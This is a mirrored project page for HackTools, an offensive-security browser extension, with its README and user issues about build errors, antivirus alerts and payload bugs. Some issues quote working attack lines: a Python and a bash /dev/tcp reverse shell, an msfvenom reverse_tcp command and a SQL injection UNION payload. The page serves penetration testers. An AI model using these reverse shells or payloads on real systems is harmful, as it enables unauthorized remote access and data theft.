Giter Club home page Giter Club logo

hack-tools's Introduction

logo_hack_tools

Welcome to HackTools !

Version mozilla chrome-extension safari-extension Downloads RawSecInventory

Introduction   —   Preview   —   Install   —   Build   —   Support


Note

Dear Users,

We're excited to announce a major revamp of our app! Due to recent changes and multiple complications with the browser extension environment, we have decided to develop HackTools as a web application moving forward.

To keep you engaged, we have uploaded our latest browser extension build alpha at this link: https://hacktools.sh

Stay tuned for exciting new features and improvements coming soon!

Thank you for your support.


The all-in-one browser extension for offensive security professionals

HackTools, is a web extension facilitating your web application penetration tests, it includes cheat sheets as well as all the tools used during a test such as XSS payloads, Reverse shells and much more.

With the extension you no longer need to search for payloads in different websites or in your local storage space, most of the tools are accessible in one click. HackTools is accessible either in pop up mode or in a whole tab in the Devtools part of the browser with F12.

Current functions

  • Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat)
  • Shell Spawning (TTY Shell Spawning)
  • XSS Payloads
  • Basic SQLi payloads
  • Local file inclusion payloads (LFI)
  • Base64 Encoder / Decoder
  • Hash Generator (MD5, SHA1, SHA256, SHA512, SM3)
  • Useful Linux commands (Port Forwarding, SUID)
  • Various method of data exfiltration and download from a remote machine

Command Palette

With the new version of the extension, a command panel has been added in order to facilitate the use of the experience. The command panel allows you to access all the functions of the extension in a few keystrokes.

To open the command palette, you can use the shortcut CTRL + K or + K on macOS.

  • You can use the and arrow keys to navigate through the different commands.
  • Enter to validate your choice.
  • + L to toggle the dark theme.
  • CTRL + ALT + 1,2,3,4 to switch between the different tabs.

Preview

preview_2
preview_3
preview_4
preview_5
preview_6

Install the extension

chromium_icon Chromium based browser

You can download the latest build here.

Or, you can download the extension on the chrome web store here.

Otherwise, you can build the project yourself from the source code

firefox_icon Mozilla Firefox

You can download HackTools on the Firefox browser add-ons here.

safari_icon Instructions to build for Safari

Create a safari web extension project using the command below. This is to be run once.

xcrun safari-web-extension-coverter [path_to_dist_folder]

Follow the instructions to create the project the default language should be Swift.

  • Build project.
  • Open Safari and enable unsigned extensions; Develop -> Allow Unsigned Extensions.
  • Open Safari -> Preferences -> Extensions and enable Hack-Tools
  • Click on the extension icon and switch to full screen mode.

Instructions provided by jayluxferro

Build from source code

git clone https://github.com/LasCC/Hack-Tools.git
cd Hack-Tools
npm install && npm run build

Once the build is done correctly, webpack will create a new folder called dist

After that you need to go to the extension tab on your chrome based navigator and turn on the developer mode

extension_tutorial

Then click on the load unpacked button in the top left corner

extension_tutorial

Once you clicked on the button you just need to select the dist folder and that's it ! 🎉

extension_tutorial

Authors

👤 Ludovic COULON & Riadh BOUCHAHOUA

Show your support

You can give a ⭐️ if this project helped you !

Note that this project is maintained, developed and made available for free, you can offer us a coffee, it will be very encouraging and greatly appreciated 😊

Paypal

hack-tools's People

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

hack-tools's Issues

FileNaming :/

Un fichier infecté a tenté de s'exécuter sur votre appareil.
Nom de la menace: Heur.BZC.PZQ.Boxter.6009.024F0EB9
Chemin : /Users/rafaelmoreno/Anytime/Hack-Tools/src/components/linux/ReverseShell.tsx
Nous avons effacé ce fichier en quarantaine pour éviter que des commandes malveillantes soient exécutées sur votre appareil.

build error

$ uname -a
Darwin 51pwns-MacBook-Pro.local 21.4.0 Darwin Kernel Version 21.4.0: Mon Feb 21 20:34:37 PST 2022; root:xnu-8020.101.4~2/RELEASE_X86_64 x86_64
$ npm -v
8.5.5
$ node -v
v17.8.0

npm install

64 timing idealTree Completed in 19938ms
165 timing command:install Completed in 19950ms
166 verbose stack Error: could not resolve
166 verbose stack     at PlaceDep.failPeerConflict (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/place-dep.js:546:25)
166 verbose stack     at PlaceDep.place (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/place-dep.js:197:21)
166 verbose stack     at new PlaceDep (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/place-dep.js:71:10)
166 verbose stack     at /usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/build-ideal-tree.js:964:31
166 verbose stack     at Array.map (<anonymous>)
166 verbose stack     at Arborist.[buildDepStep] (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/build-ideal-tree.js:964:8)
166 verbose stack     at async Arborist.buildIdealTree (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/build-ideal-tree.js:216:7)
166 verbose stack     at async Promise.all (index 1)
166 verbose stack     at async Arborist.reify (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/reify.js:153:5)
166 verbose stack     at async Install.exec (/usr/local/lib/node_modules/npm/lib/commands/install.js:159:5)
167 verbose cwd /Users/51pwn/MyWork/Hack-Tools
168 verbose Darwin 21.4.0
169 verbose argv "/usr/local/Cellar/node/17.8.0/bin/node" "/usr/local/bin/npm" "install"
170 verbose node v17.8.0
171 verbose npm  v8.5.5
172 error code ERESOLVE

npm ERR! code ERESOLVE
npm ERR! ERESOLVE could not resolve
npm ERR! 
npm ERR! While resolving: [email protected]
npm ERR! Found: [email protected]
npm ERR! node_modules/react
npm ERR!   react@"latest" from the root project
npm ERR!   peer react@">=16.0.0" from @ant-design/[email protected]
npm ERR!   node_modules/@ant-design/icons
npm ERR!     @ant-design/icons@"4.7.0" from the root project
npm ERR!   1 more (react-dom)
npm ERR! 
npm ERR! Could not resolve dependency:
npm ERR! @hot-loader/react-dom@"^17.0.1" from the root project
npm ERR! 
npm ERR! Conflicting peer dependency: [email protected]
npm ERR! node_modules/react
npm ERR!   peer react@"17.0.2" from @hot-loader/[email protected]
npm ERR!   node_modules/@hot-loader/react-dom
npm ERR!     @hot-loader/react-dom@"^17.0.1" from the root project
npm ERR! 
npm ERR! Fix the upstream dependency conflict, or retry
npm ERR! this command with --force, or --legacy-peer-deps
npm ERR! to accept an incorrect (and potentially broken) dependency resolution.

A little off topic

image
How did you change the colors of google chrome like in the images above? Is there an extension for this? @LasCC @rb-x (If those screenshots were taken in some other browser, I am sorry for asking.)

Support for Safari Browser

Hi @LasCC , thanks for the good work. I ported the extension to safari. It works perfectly in full screen mode. The only issue is that there is a lag when using the popup mode. Aside that it's pretty cool. Thanks.

Instructions to build for Safari

  1. Following the build instruction in the README
  2. Create a safari web extension project using the command below. NB: This is to be run once.
xcrun safari-web-extension-coverter [path_to_dist_folder]

Follow the instructions to create the project. Default language should be Swift.
3. Build project.
4. Open Safari and enable unsigned extensions; Develop -> Allow Unsigned Extensions.
5. Open Safari -> Preferences -> Extensions and enable Hack-Tools
6. Click on the extension icon and switch to full screen mode.

Screen Shot 2021-01-27 at 1 01 12 PM
Screen Shot 2021-01-27 at 1 01 23 PM

Install

Not sure why, but yarn will not build this. Keeps giving me an error of no such directory

npm ERR

$ npm install && npm run build
npm ERR! code ERESOLVE
npm ERR! ERESOLVE unable to resolve dependency tree
npm ERR!
npm ERR! While resolving: [email protected]
npm ERR! Found: [email protected]
npm ERR! node_modules/react
npm ERR! react@"^18.2.0" from the root project
npm ERR!
npm ERR! Could not resolve dependency:
npm ERR! peer react@"17.0.2" from @hot-loader/[email protected]
npm ERR! node_modules/@hot-loader/react-dom
npm ERR! @hot-loader/react-dom@"^17.0.2" from the root project
npm ERR!
npm ERR! Fix the upstream dependency conflict, or retry
npm ERR! this command with --force or --legacy-peer-deps
npm ERR! to accept an incorrect (and potentially broken) dependency resolution.

source Build error - npm issue

Hey Team any solution

while Building from source code facing npm error issue. (npm latest version )

Second kindly add Custom Payload add features in the Next firefox (dist) version .

image

Encode URL Dont Work

Hi! First congratulations on the plugin. It's my favorite. Second, I wanted to report that the encode of a bash reverse shell is not working correctly. Encode always never works. See the result of what I copied:

bash%20-c%20'exec%20bash%20-i%20&%3E/dev/tcp/10.4.12.124/1234%20%3C&1'

Now look at the difference between another well known tool. I believe that some bars need to be replaced for it to work correctly.

bash%20-c%20%27exec%20bash%20-i%20%26%3E%2Fdev%2Ftcp%2F10.4.12.124%2F1234%20%3C%261%27

By: https://www.urlencoder.org/

Thanks.

Bad for school

This is horrible and wrong this goes against school rules

Bug report - Commas appear between values when copying to clipboard in MSF Venom Builder

Hello,

I would like to report a bug in the MSF Venom Builder. When copying the generated payload to the clipboard, commas appear between each value, which can cause issues when trying to use the payload in other tools or scripts.

Steps to reproduce:

  1. Launch the MSF Venom Builder.
  2. Select the desired payload and options.
  3. Click the "Copy to Clipboard" button for msf venom command.
  4. Paste the clipboard contents into a text editor or other tool.

Expected result:
The generated payload should be copied to the clipboard without any extra characters or formatting.

Actual result:
Commas appear between each value of the generated payload when it is copied to the clipboard.

This bug can be frustrating and time-consuming to work around, and I would appreciate it if the developers could investigate and fix the issue as soon as possible.

Thank you for your attention to this matter.

I need help

i have copied the bash url encoded and put it in my kali linux therminal but it says "zsh: no such file or directory: bash%20-c%20exec%20bash%20-i%20&%3E/dev/tcp//%20%3C&1
"

Cannot build shell via msfvenom

Hi,
It seems the copy icon at syntax of MSF Venom Command is not correct

When I paste in Terminal Console or Notepad, it always insert comma between each selection

msfvenom -p ,linux/x64/shell/reverse_tcp, LHOST=10.10.16.15, LPORT=4444, --platform linux, -a x64,false,false,false,false, -f elf, -o reverse-x64.exe

→ If I remove all the comma, it works

Regards!

Windows Defender other AV reporting malware

Hi there,

This might be known -but not finding references to it. Windows defender is reporting the extension as containing malware, notably Win32/Uwamson.A!ml

I suspect it's due to the content of the extension and that the AV heuristics are reporting on that, more than actual malware.

Just thought I'd let you know if you've not heard about it.

yarn build -> Module not found: Error: Can't resolve ...

I got same issue as @UchihaSR : #28 (comment)
Then I following the error message and change this to what the error told :

And rerun yarn build result successfull build dist
I don't know why it happen just File_transfer & Cve. The fact that all inside folder components works fine.

python reverse shell not working

TODO :

Replace python reverse shell by

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

An incomplete payload

image
The red box in the figure should be "' UNION SELECT column_name,NULL FROM all_tab_columns where table_name="X" -- -"

Missed a double quote

Powershell handy commands missed a double quote on the below command.

wmic qfe get HotfixID,ServicePackInEffect,InstallDate,InstalledBy,InstalledOn"

Add Windows commands

First of all, this tool looks really nice, good job there!

I think it would be good to have an Useful Windows commands (similar to the Linux one)

My .2 😄

Powershell comands wrong

As someone who is familiar with windows power shell, it came to a surprise that a Firefox extension would have wrong/outdated tools on its extension. Please fix this soon.

Semantic versioning for releases

At the moment, loading Hack-Tools in my Chromium based browser throws an error with the version number defined in the manifest.json file, specifically because the version is 0.1.2b. This is what the file looks like at the moment (as of this release):

{
  "name": "Hack Tools",
  "version": "0.1.2b",
  "description": "The all in one Red team extension for web pentester",
  "browser_action": {
    "default_title": "Hack Tools",
    "default_popup": "index.html",
    "default_icon": {
      "16": "get_started16.png",
      "32": "get_started32.png",
      "48": "get_started48.png",
      "128": "get_started128.png"
    }
  },
  "icons": {
    "16": "get_started16.png",
    "32": "get_started32.png",
    "48": "get_started48.png",
    "128": "get_started128.png"
  },
  "manifest_version": 2,
  "devtools_page": "devtools.html"
}

Switching 0.1.2b to 0.1.2 manually seemed to fix the issue for me, and it'd be great if this change could be incorporated in the next release too.

add license

it's a very interesting project!

Would you consider adding a license to this repository to specify under which terms this code can be used?

npm run build Can't resolve bugs

  • Hi, I ran into 2 errors when build it locally with npm run build
ERROR in ./src/components/LayoutApp.js
Module not found: Error: Can't resolve './file_transfer/File_transfer' in '/home/madscientist/Documents/CTFTools/chrome-extensions/Hack-Tools/src/components'
 @ ./src/components/LayoutApp.js 19:0-57 104:20-32
 @ ./src/App.js

ERROR in ./src/components/FeedRSS.js
Module not found: Error: Can't resolve './rss/Cve' in '/home/madscientist/Documents/CTFTools/chrome-extensions/Hack-Tools/src/components'
 @ ./src/components/FeedRSS.js 8:0-28 103:24-27 116:26-29
 @ ./src/components/LayoutApp.js
 @ ./src/App.js
  • Then i found it's caused by 2 typing errors
./src/components/LayoutApp.js:19: import FileTransfer from "./file_transfer/File_transfer";
=> should be "./file_transfer/file_transfer"
./src/components/FeedRSS.js:8: import cve from './rss/Cve';
=> should be "./rss/cve"
  • Btw, the command to build locally with npm in README.md should be
npm install && npm run build
  • Hope u will fix those on git version

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.